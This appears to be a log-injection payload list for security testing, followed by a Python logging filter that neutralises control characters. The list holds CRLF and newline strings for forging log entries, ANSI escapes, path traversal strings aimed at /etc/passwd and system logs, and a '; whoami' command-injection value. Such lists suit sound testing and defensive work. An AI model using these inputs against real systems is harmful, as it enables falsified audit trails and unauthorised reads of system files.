# Log Injection Payloads

# CRLF injection in logs
\r\n
\r\nUser: admin logged in successfully
%0d%0a
%0d%0aAuthentication successful for admin

# Log poisoning
\nuser=admin authenticated=true\n
\r\nSUCCESS: Admin login\r\n
%0auser:admin%0astatus:success%0a

# Log format manipulation
admin\nAuthenticated:true
test\r\nRole:administrator

# Time-based log injection
[2023-01-01 00:00:00] User admin logged in successfully
[CRITICAL] Unauthorized access detected

# Null byte injection in logs
admin\x00
user\x00admin

# ANSI escape sequences (log injection)
\x1b[31mCRITICAL\x1b[0m
\033[1;31mALERT\033[0m

# Log file path traversal
../../logs/application.log
/var/log/auth.log
../../../var/log/syslog

# Events to test if they appear in logs
# Try these payloads and verify they are logged appropriately:
# - Failed login attempts
# - Successful login
# - Password changes
# - Privilege escalation attempts
# - Administrative actions
# - Access to sensitive data
# - Invalid input
# - Authentication failures
# - Authorization failures

# Sample payloads to check logging behavior
SELECT * FROM users WHERE username='admin' AND password='wrong'
../../../etc/passwd
; whoami
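The CRLF, null-byte and ANSI entries above should all end up as one inert line per event. The following is an added example, not part of the original list: a Python `logging` filter that renders control characters as visible escapes before the record is written. The names `neutralize`, `SingleLineFilter`, `render` and the logger name `auth-demo` are assumptions made for this example, and the sample usernames are constructed from the payloads above.

```python
import io
import logging
import re

# C0 controls (CR, LF, NUL, ESC ...), DEL, C1 controls, Unicode line and
# paragraph separators, and the backslash itself.
_UNSAFE = re.compile(r"[\x00-\x1f\x7f-\x9f\u2028\u2029\\]")


def _escape(match: re.Match) -> str:
    ch = match.group()
    if ch == "\\":
        # Double real backslashes so a typed "\x0a" cannot pass for an escaped LF.
        return "\\\\"
    code = ord(ch)
    return f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}"


def neutralize(value: object) -> str:
    """Return value as single-line text with control characters made visible."""
    return _UNSAFE.sub(_escape, str(value))


class SingleLineFilter(logging.Filter):
    """Neutralize the fully formatted message so one event stays one line.

    Attach it to a single handler; running it twice doubles the backslashes.
    """

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = neutralize(record.getMessage())
        record.args = None
        return True


def render(username: str) -> str:
    """Log one failed login for username and return what the handler wrote."""
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    handler.addFilter(SingleLineFilter())
    log = logging.Logger("auth-demo")  # hypothetical logger name
    log.addHandler(handler)
    log.warning("login failed user=%s", username)
    return buf.getvalue()
```

The percent-encoded entries (`%0d%0a`, `%0a`) only become control characters once something decodes them, so the filter belongs at the log sink, after any URL decoding the application performs.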